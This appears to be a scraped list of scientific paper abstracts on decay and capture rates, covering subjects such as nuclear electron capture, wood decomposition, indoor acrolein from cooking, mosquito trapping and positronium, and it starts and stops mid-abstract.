pentapeptide Leu-enkephalin (YGGFL). The fluorescence lifetimes were analyzed to determine the rotameric interchange rates in the context of a model incorporating exchange among three rotameric states. Maximum entropy method analysis verified the presence of three fluorescence decay components for YGGFL and two for YGG and NATyrA. Rotameric exchange between the gauche(-) and trans states occurred on the nanosecond time scale, whereas exchange with the gauche(+) state occurred on a longer time scale. Good agreement was obtained with rotameric populations and exchange rates from molecular dynamics simulations. Quenching by iodide was used to vary the intrinsic fluorescence lifetimes, providing additional constraints on the determined interchange rates. The temperature dependence was measured to determine barriers to exchange of the two most populated rotamers of 3, 5, and 7 kcal/mol for NATyrA, YGG, and YGGFL, respectively. 1. Absolute intensities of the γ-ray emissions originating from the electron capture decay of 153Gd Shearman, R.; Collins, S. M.; Keightley, J. D.; Pearce, A. K.; Garnier, J. 2017-09-01 153Gd has widespread use, in non-destructive testing, as a line source in SPECT imaging and has been recently proposed as an in-vitro interstitial rotating shield brachytherapy (I-RSBT) source. In this work, the six most intense emissions in the de-excitation of the daughter nucleus 153Eu have been measured, with an improved accuracy and precision to γ-ray emission intensities reported previously, via two characterised HPGe spectrometers. A specific absolute activity of 512.5 (25) kBq g-1 was determined using the 4π (LS)-γ digital coincidence counting technique. This absolute activity was used to determine an absolute intensity for the 97.4 keV γ-ray emission of 30.15 (20) per 100 decays. The reported absolute emission intensity of this transition in this work has a relative difference of 4% from the currently recommended value. 2. Measurement of the double K-shell vacancy creation probability in the electron-capture decay of 55Fe with active-pixel detectors Michel, Thilo; Bergmann, Benedikt; Durst, Jürgen; Filipenko, Mykaylo; Gleixner, Thomas; Zuber, Kai 2014-01-01 Background: In electron-capture decay, a second K-shell vacancy is eventually created with a small probability. Measurements of the double-vacancy creation probability per K-shell electron capture PKK of various nuclei undergoing electron-capture decays have already been performed, but the statistical accuracy of PKK of several nuclides is still not satisfying. Purpose: The purpose of this experiment was to improve the statistical error of PKK in the decay of 55Fe and to demonstrate the possibility of detecting double-vacancy creation events with position resolving pixel detectors. This enables angle resolved measurements. Method: For the first time, two active-pixel detectors (A,B) were used to detect satellite- and hypersatellite-line photons in coincidence either both in two clusters of triggered pixels in only one detector (A,B) or in both detectors (A∧B). PKK was determined for the two detectors regarded as one single, larger detector (PKK), for each detector separately (single-sided analysis: PKK ,A⊻B), and for both detectors in coincidence (double-sided analysis: PKK ,A∧B). Results: The result of the experiment is PKK=(1.531±0.079)×10-4 with a systematic error of (ΔPKK)syst=±0.023×10-4. This value is in agreement with the value previously measured by Campbell et al. of PKK=(1.3±0.2)×10-4. The discrepancy in literature between PKK of 54Mn to the expected value extrapolated from 55Fe almost vanished with our result. The asymmetry between the result of the single-sided analysis (PKK ,A⊻B) and the double-sided analysis (PKK ,A∧B) is consistent with zero: (PKK ,A⊻B-PKK ,A∧B)/(PKK ,A⊻B+PKK ,A∧B)=-0.003±0.051. This supports the assumption that angular correlations between the two photons are negligible within the achieved level of statistical accuracy for the given angular acceptance of our detectors. Conclusions: One can conclude that hybrid photon counting pixel detectors can be used to measure angular correlations between the directions 3. Tracing nitrogen accumulation in decaying wood and examining its impact on wood decomposition rate Rinne, Katja T.; Rajala, Tiina; Peltoniemi, Krista; Chen, Janet; Smolander, Aino; Mäkipää, Raisa 2016-04-01 Decomposition of dead wood, which is controlled primarily by fungi is important for ecosystem carbon cycle and has potentially a significant role in nitrogen fixation via diazotrophs. Nitrogen content has been found to increase with advancing wood decay in several studies; however, the importance of this increase to decay rate and the sources of external nitrogen remain unclear. Improved knowledge of the temporal dynamics of wood decomposition rate and nitrogen accumulation in wood as well as the drivers of the two processes would be important for carbon and nitrogen models dealing with ecosystem responses to climate change. To tackle these questions we applied several analytical methods on Norway spruce logs from Lapinjärvi, Finland. We incubated wood samples (density classes from I to V, n=49) in different temperatures (from 8.5oC to 41oC, n=7). After a common seven day pre-incubation period at 14.5oC, the bottles were incubated six days in their designated temperature prior to CO2 flux measurements with GC to determine the decomposition rate. N2 fixation was measured with acetylene reduction assay after further 48 hour incubation. In addition, fungal DNA, (MiSeq Illumina) δ15N and N% composition of wood for samples incubated at 14.5oC were determined. Radiocarbon method was applied to obtain age distribution for the density classes. The asymbiotic N2 fixation rate was clearly dependent on the stage of wood decay and increased from stage I to stage IV but was substantially reduced in stage V. CO2 production was highest in the intermediate decay stage (classes II-IV). Both N2 fixation and CO2 production were highly temperature sensitive having optima in temperature 25oC and 31oC, respectively. We calculated the variation of annual levels of respiration and N2 fixation per hectare for the study site, and used the latter data together with the 14C results to determine the amount of N2 accumulated in wood in time. The proportion of total nitrogen in wood 4. Can terrestrial biosphere models capture the response of atmospheric CO2 growth rate to ENSO? Fang, Y.; Michalak, A. M.; Schwalm, C. R.; Huntzinger, D. N.; Wei, Y.; Cook, R. B.; Schaefer, K. M.; Jacobson, A. R.; Ciais, P.; Fisher, J. B.; Hayes, D. J.; Huang, M.; Ito, A.; Jain, A.; Lei, H.; Lu, C.; Maignan, F.; Mao, J.; Parazoo, N.; Peng, S.; Poulter, B.; Ricciuto, D. M.; Shi, X.; Tian, H.; Zeng, N.; Zhao, F.; Wang, W. 2014-12-01 Previous studies have highlighted ENSO as a key driver of the interannual variability of atmospheric CO2 growth rate (AGR) through its influence on the biospheric carbon cycle. The biophysical mechanisms leading to this influence remain unclear, however. Understanding and correctly representing those mechanisms would provide crucial diagnostic tools to improve predictions of future changes to the global carbon cycle. Here we analyze the correlation between annual AGR and the Nino 3.4 index during 1959-2010 to elucidate the response of the biospheric carbon cycle to ENSO. We further compare these results with the responses implied by 11 process-based models participating the Multi-scale Synthesis and Terrestrial Model Intercomparison project (MsTMIP). We find that the annual AGR is strongly correlated with the ENSO index during the preceding September to February, with stronger land CO2 sources following stronger El Nino signals. This response results from teleconnections between tropical temperatures and ENSO, as well as from the influence of tropical temperatures on the biospheric carbon cycle. MsTMIP models capture this correlation, but overestimate it. This is due to an unrealistically high sensitivity of simulated NEE to tropical precipitation. In particular, the response of AGR to ENSO becomes asymmetric under positive and negative phases of ENSO, with their correlation with ENSO index peaking at different times for post-El Nino and post-La Nina years. This asymmetric response is not captured by models, and the simulated responses for post-El Nino years are highly inconsistent across models as well as between models and AGR. Models therefore appear to have problems in simulating the biophysical mechanisms after El Nino years, mechanisms that are likely associated with anomalously dry conditions. As stronger and more frequent El Nino events are projected under climate change, these results suggest that model response to ENSO variability needs to be improved in 5. Rate Equation Theory for Island Sizes and Capture Zone Areas in Submonolayer Deposition: Realistic Treatment of Spatial Aspects of Nucleation SciTech Connect Evans, J W; Li, M; Bartelt, M C 2002-12-05 Extensive information on the distribution of islands formed during submonolayer deposition is provided by the joint probability distribution (JPD) for island sizes, s, and capture zone areas, A. A key ingredient determining the form of the JPD is the impact of each nucleation event on existing capture zone areas. Combining a realistic characterization of such spatial aspects of nucleation with a factorization ansatz for the JPD, we provide a concise rate equation formulation for the variation with island size of both the capture zone area and the island density. 6. Cooperative Lamb shift and the cooperative decay rate for an initially detuned phased state SciTech Connect Friedberg, Richard; Manassah, Jamal T. 2010-04-15 The cooperative Lamb shift (CLS) is hard to measure because in samples much larger than a resonant wavelength it is much smaller, for an initially prepared resonantly phased state, than the cooperative decay rate (CDR). We show, however, that if the phasing of the initial state is detuned so that the spatial wave vector is k{sub 1} congruent with k{sub 0{+-}}O((1/R)) (where k{sub 0}={omega}{sub 0}/c is the resonant frequency), the CLS grows to 'giant' magnitudes making it comparable to the CDR. Moreover, for certain controlled values of detuning, the initial CDR becomes small so that the dynamical Lamb shift (DLS) can be measured over a considerable period of time. 7. Combined results on b-hadron production rates, lifetimes, oscillations and semileptonic decays SciTech Connect WIllocq, stephane 2000-08-02 Combined results on b-hadron lifetimes, b-hadron production rates B{sub d}{sup 0}--Anti-B{sub d}{sup 0} and B{sub s}{sup 0}--Anti-B{sub s}{sup 0} oscillations, the decay width difference between the mass eigenstates of the B{sub s}{sup 0}--Anti-B{sub s}{sup 0} system, and the values of the CKM matrix elements {vert_bar}V{sub cb}{vert_bar} and {vert_bar}V{sub ub}{vert_bar} are obtained from published and preliminary measurements available in Summer 99 from the ALEPH, CDF, DELPHI, L3, OPAL and SLD Collaborations. 8. Spontaneous decay rate and Casimir-Polder potential of an atom near a lithographed surface Bennett, Robert 2015-08-01 Radiative corrections to an atom are calculated near a half-space that has arbitrarily shaped small depositions upon its surface. The method is based on calculation of the classical Green's function of the macroscopic Maxwell equations near an arbitrarily perturbed half-space using a Born-series expansion about the bare half-space Green's function. The formalism of macroscopic quantum electrodynamics is used to carry this over into the quantum picture. The broad utility of the calculated Green's function is demonstrated by using it to calculate two quantities: the spontaneous decay rate of an atom near a sharp surface feature and the Casimir-Polder potential of a finite grating deposited on a substrate. Qualitatively different behavior is found for the latter case where it is observed that the periodicity of the Casimir-Polder potential persists even outside the immediate vicinity of the grating. 9. Indoor acrolein emission and decay rates resulting from domestic cooking events Seaman, Vincent Y.; Bennett, Deborah H.; Cahill, Thomas M. 2009-12-01 Acrolein (2-propenal) is a common constituent of both indoor and outdoor air, can exacerbate asthma in children, and may contribute to other chronic lung diseases. Recent studies have found high indoor levels of acrolein and other carbonyls compared to outdoor ambient concentrations. Heated cooking oils produce considerable amounts of acrolein, thus cooking is likely an important source of indoor acrolein. A series of cooking experiments were conducted to determine the emission rates of acrolein and other volatile carbonyls for different types of cooking oils (canola, soybean, corn and olive oils) and deep-frying different food items. Similar concentrations and emission rates of carbonyls were found when different vegetable oils were used to deep-fry the same food product. The food item being deep-fried was generally not a significant source of carbonyls compared to the cooking oil. The oil cooking events resulted in high concentrations of acrolein that were in the range of 26.4-64.5 μg m -3. These concentrations exceed all the chronic regulatory exposure limits and many of the acute exposure limits. The air exchange rate and the decay rate of the carbonyls were monitored to estimate the half-life of the carbonyls. The half-life for acrolein was 14.4 ± 2.6 h, which indicates that indoor acrolein concentrations can persist for considerable time after cooking in poorly-ventilated homes. 10. Spatio-temporal attributes of left ventricular pressure decay rate during isovolumic relaxation. PubMed Ghosh, Erina; Kovács, Sándor J 2012-03-01 Global left ventricular (LV) isovolumic relaxation rate has been characterized: 1) via the time constant of isovolumic relaxation τ or 2) via the logistic time constant τ(L). An alternate kinematic method, characterizes isovolumic relaxation (IVR) in accordance with Newton's Second Law. The model's parameters, stiffness E(k), and damping/relaxation μ result from best fit of model-predicted pressure to in vivo data. All three models (exponential, logistic, and kinematic) characterize global relaxation in terms of pressure decay rates. However, IVR is inhomogeneous and anisotropic. Apical and basal LV wall segments untwist at different times and rates, and transmural strain and strain rates differ due to the helically variable pitch of myocytes and sheets. Accordingly, we hypothesized that the exponential model (τ) or kinematic model (μ and E(k)) parameters will elucidate the spatiotemporal variation of IVR rate. Left ventricular pressures in 20 subjects were recorded using a high-fidelity, multipressure transducer (3 cm apart) catheter. Simultaneous, dual-channel pressure data was plotted in the pressure phase-plane (dP/dt vs. P) and τ, μ, and E(k) were computed in 1631 beats (average: 82 beats per subject). Tau differed significantly between the two channels (P < 0.05) in 16 of 20 subjects, whereas μ and E(k) differed significantly (P < 0.05) in all 20 subjects. These results show that quantifying the relaxation rate from data recorded at a single location has limitations. Moreover, kinematic model based analysis allows characterization of restoring (recoil) forces and resistive (crossbridge uncoupling) forces during IVR and their spatio-temporal dependence, thereby elucidating the relative roles of stiffness vs. relaxation as IVR rate determinants. 11. Graphene plasmonics for tuning photon decay rate near metallic split-ring resonator in a multilayered substrate. PubMed Chen, Yongpin P; Sha, Wei E I; Jiang, Lijun; Hu, Jun 2015-02-09 Study of photon decay rate is essential to various optical devices, where graphene is an emerging building block due to its electrical tunability. In this paper, we study photon decay rate of a quantum emitter near a metallic split-ring resonator, which is embedded in a multilayered substrate incorporating a graphene layer. Analyzing photon decay rate in such a complex multilayered system is not only computationally challenging but also highly important to experimentally realizable devices. First, the dispersion relation of graphene plasmonics supported at a dieletric/graphene/dielectric structure is investigated systematically. Meanwhile, the dispersion relation of metallic plasmonics supported at a dielectric/metal structure is studied comparatively. According to our investigation, graphene offers several flexible tuning routes for manipulating photon decay rate, including tunable chemical potential and the emitter's position and polarization. Next, considering plasmonic waves in a graphene sheet occur in the infrared regime, we carefully design a metallic split ring resonating around the same frequency range. Consequently, this design enables a mutual interaction between graphene plasmonics and metallic plasmonics. The boundary element method with a multilayered medium Green's function is adopted in the numerical simulation. Blue-shifted and splitting resonance peaks are theoretically observed, which suggests a strong mode coupling. Moreover, the mode coupling has a switch on-off feature via electrostatically doping the graphene sheet. This work is helpful to dynamically manipulate photon decay rate in complex optical devices. 12. Decay Rates and Semi-stable Fraction Formation after 12 years of Foliar Litter Decomposition in Canadian Forests Trofymow, J. A.; Smyth, C.; Moore, T.; Prescott, C.; Titus, B.; Siltanen, M.; Visser, S.; Preston, C. M.; Nault, J. 2009-12-01 Litter decay in early and midphases of decomposition have been shown to highly influenced by climate and substrate quality, however factors affecting decay during the late semi-stable phase are less well understood. The Canadian Intersite Decomposition Experiment (CIDET) was established in 1992 with the objective of providing data on the long-term rates of litter decomposition and nutrient mineralization for a range of forested ecoclimatic regions in Canada. Such data were needed to help verify models used for national C accounting, as well as aid in the development of other soil C models. CIDET examined the annual decay, over a 12-year period, of 10 standard foliar litters and 2 wood substrates at 18 forested upland and 3 wetland sites ranging from the cool temperate to subarctic regions, a nearly 20oC span in temperature. On a subset of sites and litter types, changes in litter C chemistry over time were also determined. Over the first 6 years, C/N ratio and iron increased, NMR showed an overall decline in O-alkyl C (carbohydrates) and increase in alkyl, aromatic, phenolic, and carboxyl C. Proximate analysis showed the acid unhydrolyzable residue (AUR) increases, but true lignin did not accumulate, in contrast to the conceptual ligno-cellulose model of decomposition. Litter decay during first phase was related to initial litter quality (AUR and water soluble extract), winter precipitation, but not temperature, suggesting the importance of leaching during this phase. Decay rate “k” during the mid phase was related to temperature, initial litter quality (AUR and AUR/N), summer precipitation, but not soil N. In most cases decay had approached an asymptote before end of experiment. Although annual temperature was the best single predictor for 12-year asymptotes, summer precipitation and forest floor pH and C/N ratio were the best set of combined predictors. The changes in the decay factors during different phases may explain some of the discrepancies in the 13. Pressure Decay Testing Methodology for Quantifying Leak Rates of Full-Scale Docking System Seals NASA Technical Reports Server (NTRS) Dunlap, Patrick H., Jr.; Daniels, Christopher C.; Wasowski, Janice L.; Garafolo, Nicholas G.; Penney, Nicholas; Steinetz, Bruce M. 2010-01-01 NASA is developing a new docking system to support future space exploration missions to low-Earth orbit and the Moon. This system, called the Low Impact Docking System, is a mechanism designed to connect the Orion Crew Exploration Vehicle to the International Space Station, the lunar lander (Altair), and other future Constellation Project vehicles. NASA Glenn Research Center is playing a key role in developing the main interface seal for this docking system. This seal will be relatively large with an outside diameter in the range of 54 to 58 in. (137 to 147 cm). As part of this effort, a new test apparatus has been designed, fabricated, and installed to measure leak rates of candidate full-scale seals under simulated thermal, vacuum, and engagement conditions. Using this test apparatus, a pressure decay testing and data processing methodology has been developed to quantify full-scale seal leak rates. Tests performed on untreated 54 in. diameter seals at room temperature in a fully compressed state resulted in leak rates lower than the requirement of less than 0.0025 lbm, air per day (0.0011 kg/day). 14. Deprotonation yields, pKa, and aci-nitro decay rates in some substituted o-nitrobenzaldehydes. PubMed Abbruzzetti, Stefania; Carcelli, Mauro; Rogolino, Dominga; Viappiani, Cristiano 2003-07-01 In this paper we report the deprotonation yields, the pKa, and decay kinetics of the aci-nitro intermediates of some substituted 2-nitrobenzaldehydes that can be used as photoactivatable caged proton compounds. The decay of the aci-nitro absorbance for 2-nitrobenzaldehyde occurs within a few nanoseconds from photoexcitation. Addition of electron donating methoxy substituents at positions 4 and 5 leads to lower deprotonation yields, higher pKa, and slower decays of the aci-nitro intermediates. On the contrary, the decay rate is accelerated by the introduction of an electron-withdrawing Cl atom at position 4 in the phenyl ring, with little influence on the deprotonation yield and pKa of the aci-nitro intermediate. 15. Origin of meteoritic stardust unveiled by a revised proton-capture rate of 17O Lugaro, M.; Karakas, A. I.; Bruno, C. G.; Aliotta, M.; Nittler, L. R.; Bemmerer, D.; Best, A.; Boeltzig, A.; Broggini, C.; Caciolli, A.; Cavanna, F.; Ciani, G. F.; Corvisiero, P.; Davinson, T.; Depalo, R.; di Leva, A.; Elekes, Z.; Ferraro, F.; Formicola, A.; Fülöp, Zs.; Gervino, G.; Guglielmetti, A.; Gustavino, C.; Gyürky, Gy.; Imbriani, G.; Junker, M.; Menegazzo, R.; Mossa, V.; Pantaleo, F. R.; Piatti, D.; Prati, P.; Scott, D. A.; Straniero, O.; Strieder, F.; Szücs, T.; Takács, M. P.; Trezzi, D. 2017-01-01 Stardust grains recovered from meteorites provide high-precision snapshots of the isotopic composition of the stellar environment in which they formed 1 . Attributing their origin to specific types of stars, however, often proves difficult. Intermediate-mass stars of 4-8 solar masses are expected to have contributed a large fraction of meteoritic stardust 2,3 . Yet, no grains have been found with the characteristic isotopic compositions expected for such stars 4,5 . This is a long-standing puzzle, which points to serious gaps in our understanding of the lifecycle of stars and dust in our Galaxy. Here we show that the increased proton-capture rate of 17O reported by a recent underground experiment 6 leads to 17O/16O isotopic ratios that match those observed in a population of stardust grainsfor proton-burning temperatures of 60-80 MK. These temperatures are achieved at the base of the convective envelope during the late evolution of intermediate-mass stars of 4-8 solar masses 7-9 , which reveals them as the most likely site of origin of the grains. This result provides direct evidence that these stars contributed to the dust inventory from which the Solar System formed. 16. Capture-recapture-adjusted prevalence rates of type 2 diabetes are related to social deprivation. PubMed Ismail, A A; Beeching, N J; Gill, G V; Bellis, M A 1999-12-01 We examined the prevalence of type 2 diabetes and social deprivation in one urban district in Liverpool from October 1995 to September 1996 inclusive. This area has a stable Caucasian population of 176, 682. Lists were made of all known diabetics attending six different medical points of contact during the year, and were condensed and aggregated to eliminate duplicates. From postcode data, each patient was assigned to residence in one of the 14 electoral wards in the district, for which demographic structure and standardized measures of social deprivation were known (Townsend index). The crude period prevalences of type 1 and type 2 diabetes were estimated for each ward. Crude prevalence data were then corrected by applying capture-recapture (CR) techniques to the different patient datasets to allow for undercount. The crude period prevalence (95%CI) of diabetes was 1.5% (1.4-1.5%), or 2585/176, 682. The mean age of people with diabetes was not significantly different between electoral wards. The crude period prevalence of type 2 diabetes within individual wards ranged from 0.4% (0.3-0.6%) in the least deprived area to 4.1% (3.6-4.6%) in the most deprived area. The corresponding range of CR-adjusted period prevalence rates of type 2 diabetes was from 3.2% (2.8-3.6%) to 6.7% (6.1-7.4%), and there was strong correlation between both crude and CR-adjusted prevalence and social deprivation in each ward (r=0.76, p<0.001 for crude; and r=0. 49, p<0.005 for CR-adjusted prevalence). There was no correlation between the crude or CR-adjusted period prevalence rates of type 1 diabetes and Townsend index (r=0.14, p=NS). This strong correlation between the prevalence of type 2 diabetes and social deprivation has important implications for the planning of health-care delivery. 17. Coupled-Channels Study of α-DECAY Rates for Deformed Nuclei Ni, Dongdong; Ren, Zhongzhou The generalized density-dependent cluster model is devoted to calculate α-decay half-lives of spherical and deformed nuclei. The multi-channel cluster model is developed to describe the α-decay fine structure in heavy deformed nuclei, including half-lives and branching ratios. After a brief review of these two models, special cases of the α-decay fine structure are presented. Calculations are separately performed using the coupled-channels and WKB approaches. 18. Anomalous effects of radioactive decay rates and capacitance values measured inside a modified Faraday cage: Correlations with space weather Scholkmann, F.; Milián-Sánchez, V.; Mocholí-Salcedo, A.; Milián, C.; Kolombet, V. A.; Verdú, G. 2017-03-01 Recently we reported (Milián-Sánchez V. et al., Nucl. Instrum. Methods A, 828 (2016) 210) our experimental results involving 226Ra decay rate and capacitance measurements inside a modified Faraday cage. Our measurements exhibited anomalous effects of unknown origin. In this letter we report new results regarding our investigation into the origins of the observed effects. We report preliminary findings of a correlation analysis between the radioactive decay rates and capacitance time series and space weather related variables (geomagnetic field disturbances and cosmic-ray neutron counts). A significant correlation was observed for specific data sets. The results are presented and possible implications for future work discussed. 19. Energy-level shifts and the decay rate of an atom in the presence of a conducting wedge 2015-12-01 In the present article explicit expressions for the decay rate and energy-level shifts of an atom in the presence of an ideal conducting wedge, two parallel plates, and a half sheet are obtained in the framework of the canonical quantization approach. The angular and radial dependences of the decay rate for different atomic polarizations of an excited atom and also of the energy-level shifts are depicted and discussed. The consistency of the present approach in some limiting cases is investigated by comparing the relevant results obtained here to the previously reported results. 20. SU(3) flavor symmetry and CP violating rate differences for charmless B{yields}PV decays SciTech Connect Deshpande, N. G.; He, Xiao-Gang; Shi, Jian-Qing 2000-08-01 We derive several relations between CP violating rate differences {delta}(B{yields}PV)={gamma}(B{yields}PV)-{gamma}(B(bar sign){yields}P(bar sign)V(bar sign)) for charmless B{yields}PV decays in the standard model using SU(3) flavor symmetry. It is found that although the relations between branching ratios of {delta}S=0 and {delta}S=-1 processes are complicated, there are simple relations independent of hadronic models between some of the {delta}S=0 and {delta}S=-1 rate differences due to the unitarity property of the Kobayashi-Maskawa matrix, such as {delta}(B{yields}{pi}{sup +}{rho}{sup -})=-{delta}(B{yields}{pi}{sup +}K{sup *-}), {delta}(B{yields}{pi}{sup -}{rho}{sup +})=-{delta}(B{yields}K{sup -}{rho}{sup +}). SU(3) breaking effects are also estimated using the factorization approximation. These relations can be tested at B factories in the near future. (c) 2000 The American Physical Society. 1. A Novel Pulse-Chase SILAC Strategy Measures Changes in Protein Decay and Synthesis Rates Induced by Perturbation of Proteostasis with an Hsp90 Inhibitor PubMed Central Fierro-Monti, Ivo; Racle, Julien; Hernandez, Celine; Waridel, Patrice; Hatzimanikatis, Vassily; Quadroni, Manfredo 2013-01-01 Standard proteomics methods allow the relative quantitation of levels of thousands of proteins in two or more samples. While such methods are invaluable for defining the variations in protein concentrations which follow the perturbation of a biological system, they do not offer information on the mechanisms underlying such changes. Expanding on previous work [1], we developed a pulse-chase (pc) variant of SILAC (stable isotope labeling by amino acids in cell culture). pcSILAC can quantitate in one experiment and for two conditions the relative levels of proteins newly synthesized in a given time as well as the relative levels of remaining preexisting proteins. We validated the method studying the drug-mediated inhibition of the Hsp90 molecular chaperone, which is known to lead to increased synthesis of stress response proteins as well as the increased decay of Hsp90 “clients”. We showed that pcSILAC can give information on changes in global cellular proteostasis induced by treatment with the inhibitor, which are normally not captured by standard relative quantitation techniques. Furthermore, we have developed a mathematical model and computational framework that uses pcSILAC data to determine degradation constants kd and synthesis rates Vs for proteins in both control and drug-treated cells. The results show that Hsp90 inhibition induced a generalized slowdown of protein synthesis and an increase in protein decay. Treatment with the inhibitor also resulted in widespread protein-specific changes in relative synthesis rates, together with variations in protein decay rates. The latter were more restricted to individual proteins or protein families than the variations in synthesis. Our results establish pcSILAC as a viable workflow for the mechanistic dissection of changes in the proteome which follow perturbations. Data are available via ProteomeXchange with identifier PXD000538. PMID:24312217 2. Relationship between mosquito (Diptera: Culicidae) landing rates on a human subject and numbers captured using CO2-baited light traps. PubMed Barnard, D R; Knue, G J; Dickerson, C Z; Bernier, U R; Kline, D L 2011-06-01 Capture rates of insectary-reared female Aedes albopictus (Skuse), Anopheles quadrimaculatus Say, Culex nigripalpus Theobald, Culex quinquefasciatus Say and Aedes triseriatus (Say) in CDC-type light traps (LT) supplemented with CO2 and using the human landing (HL) collection method were observed in matched-pair experiments in outdoor screened enclosures. Mosquito responses were compared on a catch-per-unit-effort basis using regression analysis with LT and HL as the dependent and independent variables, respectively. The average number of mosquitoes captured in 1 min by LT over a 24-h period was significantly related to the average number captured in 1 min by HL only for Cx. nigripalpus and Cx. quinquefasciatus. Patterns of diel activity indicated by a comparison of the mean response to LT and HL at eight different times in a 24-h period were not superposable for any species. The capture rate efficiency of LT when compared with HL was ≤15% for all mosquitoes except Cx. quinquefasciatus (43%). Statistical models of the relationship between mosquito responses to each collection method indicate that, except for Ae. albopictus, LT and HL capture rates are significantly related only during certain times of the diel period. Estimates of mosquito activity based on observations made between sunset and sunrise were most precise in this regard for An. quadrimaculatus and Cx. nigripalpus, as were those between sunrise and sunset for Cx. quinquefasciatus and Ae. triseriatus. 3. Effect of Fungal Competition on Decay Rates in Bicultured Soil Bottle Assays Treesearch Grant T. Kirker; Amy Blodgett; Patricia K. Lebow; Carol A. Clausen 2016-01-01 For decades, wood scientists and preservative formulators have employed the monocultured soil bottle assay to test efficacy of wood treatment in the laboratory as a rapid predictor of field performance. This study examines the effects of bicultured soil bottle assays on the decay by common wood decay fungi. Mycelial interactions were noted in early stages of... 4. Relaxation of the CH stretch in liquid CHBr3: Solvent effects and decay rates using classical nonequilibrium simulations Ramesh, Sai G.; Sibert, Edwin L. 2006-12-01 This article addresses two questions regarding the decay of the CH stretch in liquid CHBr3. The first is whether the initial steps of the relaxation primarily involve energy redistribution within the excited molecule alone. Gas phase quantum mechanical and classical calculations are performed to examine the role of the solvent in this process. At the fundamental excitation level, it is found that CH stretch decay is, in fact, strongly solvent driven. The second question is on the applicability of a fully classical approach to the calculation of CH stretch condensed phase decay rates. To this end, nonequilibrium molecular dynamics simulations are performed. The results are compared with quantum mechanical rates computed previously. The two methods are found to be in fair agreement with each other. However, care must be exercised in the interpretation of the classical results. 5. A Correlation Between Intrinsic Brightness and Average Decay Rate of Swift UVOT GRB Optical/UV Light Curves NASA Technical Reports Server (NTRS) Oates, S. R.; Page, M. J.; De Pasquale, M.; Schady, P.; Breeveld, A. A.; Holland, S. T.; Kuin, N. P. M.; Marshall, F. E. 2012-01-01 We examine a sample of 48 Swift/UVOT long Gamma-ray Burst light curves and find a correlation between the logarithmic luminosity at 200s and average decay rate determined from 200s onwards, with a Spearman rank coefficient of -0.58 at a significance of 99.998% (4.2 sigma ). We discuss the causes of the log L200s - alpha (greater than) 200s correlation, finding it to be an intrinsic property of long GRBs, and not resulting from the selection criteria. We find two ways to produce the correlation. One possibility is that there is some property of the central engine, outflow or external medium that affects the rate of energy release so that the bright afterglows release their energy more quickly and decay faster than the fainter afterglows. Alternatively, the correlation may be produced by variation of the observers viewing angle, with observers at large viewing angles observing fainter and slower decaying light curves. 6. Experimental investigation of effect of jet decay rate on jet-induced pressures on a flat plate NASA Technical Reports Server (NTRS) Kuhlman, J. M.; Ousterhout, D. S.; Warcup, R. W. 1978-01-01 An experimental study of the interaction between a lift jet and an aircraft wing for a jet VTOL aircraft was performed for the simplified model of an unheated, subsonic, circular jet exiting at right angles to a flat plate into a uniform subsonic crosswind. The effects of jet dynamic pressure decay rate upon the jet location and jet induced pressure distribution on the plate were studied over a range of jet to crossflow velocity ratios of 2.2 or = R or = 10. Jet decay rate was varied through use of cylindrical centerbodies with flat or hemispherical tips submerged in the jet nozzle at various depths below the jet exit plane. Quicker jet dynamic pressure decay, caused by the presence of a centerbody, resulted in reductions in the jet induced lift loss by as much as 45 percent relative to values for jets with no centerbody. These reductions in lift loss were observed at the larger values of crossflow velocity. 7. A halo-independent lower bound on the dark matter capture rate in the Sun from a direct detection signal SciTech Connect Blennow, Mattias; Herrero-Garcia, Juan; Schwetz, Thomas 2015-05-21 We show that a positive signal in a dark matter (DM) direct detection experiment can be used to place a lower bound on the DM capture rate in the Sun, independent of the DM halo. For a given particle physics model and DM mass we obtain a lower bound on the capture rate independent of the local DM density, velocity distribution, galactic escape velocity, as well as the scattering cross section. We illustrate this lower bound on the capture rate by assuming that upcoming direct detection experiments will soon obtain a significant signal. When comparing the lower bound on the capture rate with limits on the high-energy neutrino flux from the Sun from neutrino telescopes, we can place upper limits on the branching fraction of DM annihilation channels leading to neutrinos. With current data from IceCube and Super-Kamiokande non-trivial limits can be obtained for spin-dependent interactions and direct annihilations into neutrinos. In some cases also annihilations into ττ or bb start getting constrained. For spin-independent interactions current constraints are weak, but they may become interesting for data from future neutrino telescopes. 8. Relationship between mosquito (Diptera: Culicidae) landing rates on a human subject and numbers captured using CO2-baited light traps USDA-ARS?s Scientific Manuscript database Capture rates of female Aedes albopictus Skuse, Aedes triseriatus (Say), Anopheles quadrimaculatus Say, Culex nigripalpus Theobald, and Culex quinquefasciatus Say in CDC-type light traps supplemented with CO2 (LT) and using the human landing (HL) collection method were observed in matched-pair exper... 9. Approaches for the Direct estimation of rate of increase in population size (λ) using capture-recapture data Treesearch James D. Nichols; Scott T. Sillett; James E. Hines; Richard T. Holmes 2005-01-01 Recent developments in the modeling of capture-recapture data permit the direct estimation and modeling of population growth rate Pradel (1996). Resulting estimates reflect changes in numbers of birds on study areas, and such changes result from movement as well as survival and reproductive recruitment. One measure of the “importance” of a... 10. Using the Inflection Points and Rates of Growth and Decay to Predict Levels of Solar Activity NASA Technical Reports Server (NTRS) Wilson, Robert M.; Hathaway, David H. 2008-01-01 The ascending and descending inflection points and rates of growth and decay at specific times during the sunspot cycle are examined as predictors for future activity. On average, the ascending inflection point occurs about 1-2 yr after sunspot minimum amplitude (Rm) and the descending inflection point occurs about 6-7 yr after Rm. The ascending inflection point and the inferred slope (including the 12-mo moving average (12-mma) of (Delta)R (the month-to-month change in the smoothed monthly mean sunspot number (R)) at the ascending inflection point provide strong indications as to the expected size of the ongoing cycle s sunspot maximum amplitude (RM), while the descending inflection point appears to provide an indication as to the expected length of the ongoing cycle. The value of the 12-mma of (Delta)R at elapsed time T = 27 mo past the epoch of RM (E(RM)) seems to provide a strong indication as to the expected size of Rm for the following cycle. The expected Rm for cycle 24 is 7.6 +/- 4.4 (the 90-percent prediction interval), occurring before September 2008. Evidence is also presented for secular rises in selected cycle-related parameters and for preferential grouping of sunspot cycles by amplitude and/or period. 11. Precision measurement of the decay rate of the negative positronium ion Ps{sup -} SciTech Connect Ceeh, Hubert; Hugenschmidt, Christoph; Schreckenbach, Klaus; Gaertner, Stefan A.; Thirolf, Peter G.; Fleischer, Frank; Schwalm, Dirk 2011-12-15 The negative positronium ion Ps{sup -} is a bound system consisting of two electrons and a positron. Its three constituents are pointlike leptonic particles of equal mass, which are subject only to the electroweak and gravitational force. Hence, Ps{sup -} is an ideal object in which to study the quantum mechanics of a three-body system. The ground state of Ps{sup -} is stable against dissociation but unstable against annihilation 